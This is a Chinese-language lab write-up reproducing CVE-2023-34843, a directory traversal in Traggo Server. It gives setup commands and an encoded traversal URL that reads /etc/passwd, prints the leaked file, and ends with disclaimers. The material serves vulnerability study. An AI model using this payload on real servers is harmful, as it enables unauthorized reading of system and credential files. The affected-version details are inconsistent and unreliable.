CVE-2023-34843—Traggo Server 文件读取漏洞

admin 2024年10月24日22:36:43评论27 views字数 4129阅读13分45秒阅读模式

CVE-2023-34843—Traggo Server 文件读取漏洞

漏洞简介

Traggo是一个基于标签的时间跟踪工具。在Traggo中,没有任务,只有标记的时间跨度traggo/server 版本 0.3.0 容易受到目录遍历的攻击。

影响版本

traggo/server 版本 0.3.0

漏洞环境

kali+ docker 设置 traggo/server

从 traggo/server Releases 下载适用的二进制文件的 zip

wget https://github.com/traggo/server/releases/download/v0.0.9/traggo-server-0.0.9-linux-amd64.zip

解压缩存档

unzip traggo-server-0.0.9-linux-amd64.zip

使二进制文件可执行

chmod +x traggo-server-0.0.9-linux-amd64

CVE-2023-34843—Traggo Server 文件读取漏洞

执行 traggo/server(默认情况下,traggo/服务器在端口 3030 上启动)

sudo ./traggo-server-0.0.9-linux-amd64

CVE-2023-34843—Traggo Server 文件读取漏洞

正在监听3030端口,浏览器访问:

http//:yuor-ip:3030

CVE-2023-34843—Traggo Server 文件读取漏洞

漏洞复现

http://localhost:3030/static/..%5c..%5c..%5c..%5cetc/passwd

CVE-2023-34843—Traggo Server 文件读取漏洞

成功读取:

root:x:0:0:root:/root:/usr/bin/zshdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin_apt:x:42:65534::/nonexistent:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologinsystemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologinmysql:x:100:107:MySQL Server,,,:/nonexistent:/bin/falsetss:x:101:108:TPM software stack,,,:/var/lib/tpm:/bin/falsestrongswan:x:102:65534::/var/lib/strongswan:/usr/sbin/nologinsystemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologinredsocks:x:103:109::/var/run/redsocks:/usr/sbin/nologinrwhod:x:104:65534::/var/spool/rwho:/usr/sbin/nologiniodine:x:105:65534::/run/iodine:/usr/sbin/nologinmessagebus:x:106:111::/nonexistent:/usr/sbin/nologinmiredo:x:107:65534::/var/run/miredo:/usr/sbin/nologinredis:x:108:114::/var/lib/redis:/usr/sbin/nologinusbmux:x:109:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologinmosquitto:x:110:116::/var/lib/mosquitto:/usr/sbin/nologintcpdump:x:111:118::/nonexistent:/usr/sbin/nologinsshd:x:112:65534::/run/sshd:/usr/sbin/nologin_rpc:x:113:65534::/run/rpcbind:/usr/sbin/nologindnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologinstatd:x:115:65534::/var/lib/nfs:/usr/sbin/nologinavahi:x:116:122:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologinstunnel4:x:996:996:stunnel service system account:/var/run/stunnel4:/usr/sbin/nologinDebian-snmp:x:117:123::/var/lib/snmp:/bin/false_gvm:x:118:124::/var/lib/openvas:/usr/sbin/nologinspeech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/falsesslh:x:120:125::/nonexistent:/usr/sbin/nologinpostgres:x:121:126:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bashpulse:x:122:127:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologinsaned:x:123:130::/var/lib/saned:/usr/sbin/nologininetsim:x:124:131::/var/lib/inetsim:/usr/sbin/nologinlightdm:x:125:132:Light Display Manager:/var/lib/lightdm:/bin/falsegeoclue:x:126:133::/var/lib/geoclue:/usr/sbin/nologinking-phisher:x:127:134::/var/lib/king-phisher:/usr/sbin/nologinpolkitd:x:994:994:polkit:/nonexistent:/usr/sbin/nologinnm-openvpn:x:128:135:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologinrtkit:x:129:136:RealtimeKit,,,:/proc:/usr/sbin/nologincolord:x:130:137:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologinnm-openconnect:x:131:138:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/usr/sbin/nologinkali:x:1000:1000:kali,,,:/home/kali:/usr/bin/zsh

修复建议

建议升级至安全版本

参考链接

https://github.com/rootd4ddy/CVE-2023-34843

CVE-2023-34843—Traggo Server 文件读取漏洞

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!

敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

原文始发于微信公众号(巢安实验室):CVE-2023-34843—Traggo Server 文件读取漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月24日22:36:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-34843—Traggo Server 文件读取漏洞https://cn-sec.com/archives/1847265.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息